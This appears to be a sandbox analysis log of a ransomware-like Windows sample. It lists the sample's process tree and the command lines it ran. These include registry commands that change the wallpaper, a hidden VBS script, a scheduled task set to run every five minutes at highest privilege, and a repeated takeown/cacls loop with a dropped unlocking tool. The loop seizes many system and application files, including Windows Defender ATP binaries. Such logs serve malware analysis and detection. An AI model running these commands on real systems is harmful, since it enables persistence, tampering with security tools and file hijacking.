C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\B16Ee4FH.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\B16Ee4FH.bmp" /f3⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
PID:1516
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:3768
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:1056
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\8fTAidAw.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\8fTAidAw.vbs"3⤵PID:4040
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\xog1T24j.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵PID:4672
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\xog1T24j.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:4768
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:4416
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:4476
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db""2⤵
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db" /E /G Admin:F /C3⤵PID:2256
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db"3⤵PID:4136
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "qmgr.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:4156 -
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "qmgr.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Users\Admin\AppData\Local\Temp\QvidfhME64.exeQvidfhME.exe -accepteula "qmgr.db" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:4208
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db""2⤵
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db" /E /G Admin:F /C3⤵PID:4308
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4328
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "SmsInterceptStore.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "SmsInterceptStore.db" -nobanner4⤵
- Executes dropped EXE
PID:4380
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4400
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""2⤵
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:4472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:4492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "classes.jsa" -nobanner3⤵PID:4512
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:4528
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4548
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa""2⤵PID:4600
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:4644
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:4716
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "classes.jsa" -nobanner3⤵PID:4736
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:4752
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4784
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:4812
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:4860
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:4900
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵
- Executes dropped EXE
PID:4916
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4940
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:4964
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:5016
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:5056
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "Workflow.Targets" -nobanner4⤵
- Executes dropped EXE
PID:5072
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files\Windows Mail\wab.exe""2⤵PID:4124
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:4152
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wab.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "wab.exe" -nobanner3⤵PID:4220
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "wab.exe" -nobanner4⤵
- Executes dropped EXE
PID:4272
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:4324
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:4384
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:4520
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "WinMail.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4540
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4468
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui""2⤵PID:4460
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui" /E /G Admin:F /C3⤵PID:4724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4760
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "MsSense.exe.mui" -nobanner3⤵PID:4776
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "MsSense.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4792
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4624
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe""2⤵PID:4828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe" /E /G Admin:F /C3⤵PID:4904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "BrowserCore.exe" -nobanner3⤵PID:4832
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "BrowserCore.exe" -nobanner4⤵
- Executes dropped EXE
PID:5024
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files\Windows Mail\wabmig.exe""2⤵PID:5060
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:5000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "wabmig.exe" -nobanner3⤵PID:2252
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "wabmig.exe" -nobanner4⤵
- Executes dropped EXE
PID:2152
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files\Windows Mail\WinMail.exe""2⤵PID:4704
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:4404
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\WinMail.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "WinMail.exe" -nobanner3⤵PID:4268
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "WinMail.exe" -nobanner4⤵
- Executes dropped EXE
PID:4508
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3796
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe""2⤵PID:4412
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" /E /G Admin:F /C3⤵PID:4564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "MsSense.exe" -nobanner3⤵PID:4456
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "MsSense.exe" -nobanner4⤵
- Executes dropped EXE
PID:4396
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:4756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:4612
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4444
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:4876
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4912
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5032
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui""2⤵PID:4824
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" /E /G Admin:F /C3⤵PID:4868
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1244
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "BrowserCore.exe.mui" -nobanner3⤵PID:4148
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "BrowserCore.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:3888
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json""2⤵PID:4712
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G Admin:F /C3⤵PID:4316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "manifest.json" -nobanner3⤵PID:640
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "manifest.json" -nobanner4⤵
- Executes dropped EXE
PID:2104
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4276
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe""2⤵PID:4304
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe" /E /G Admin:F /C3⤵PID:4524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "SenseSampleUploader.exe" -nobanner3⤵PID:4332
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "SenseSampleUploader.exe" -nobanner4⤵
- Executes dropped EXE
PID:4748
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4560
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:4432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:4872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:4764
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4620
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5068
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:4976
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:4700
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4892
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:3108
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "msoeres.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4684
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4244
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:4488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:5108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:4464
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "ImagingDevices.exe" -nobanner4⤵
- Executes dropped EXE
PID:4392
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe""2⤵PID:4568
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" /E /G Admin:F /C3⤵PID:4604
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "SenseCncProxy.exe" -nobanner3⤵PID:4632
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "SenseCncProxy.exe" -nobanner4⤵
- Executes dropped EXE
PID:5076
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2220
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:4788
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:4908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:5104
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:3840
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4984
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H""2⤵PID:5004
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵PID:4344
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1868
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "Identity-H" -nobanner3⤵PID:4852
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "Identity-H" -nobanner4⤵
- Executes dropped EXE
PID:4636
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4936
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V""2⤵PID:4628
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V" /E /G Admin:F /C3⤵PID:4368
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "Identity-V" -nobanner3⤵PID:4300
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "Identity-V" -nobanner4⤵
- Executes dropped EXE
PID:2140
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5092
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe""2⤵PID:4696
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe" /E /G Admin:F /C3⤵PID:5028
-
-
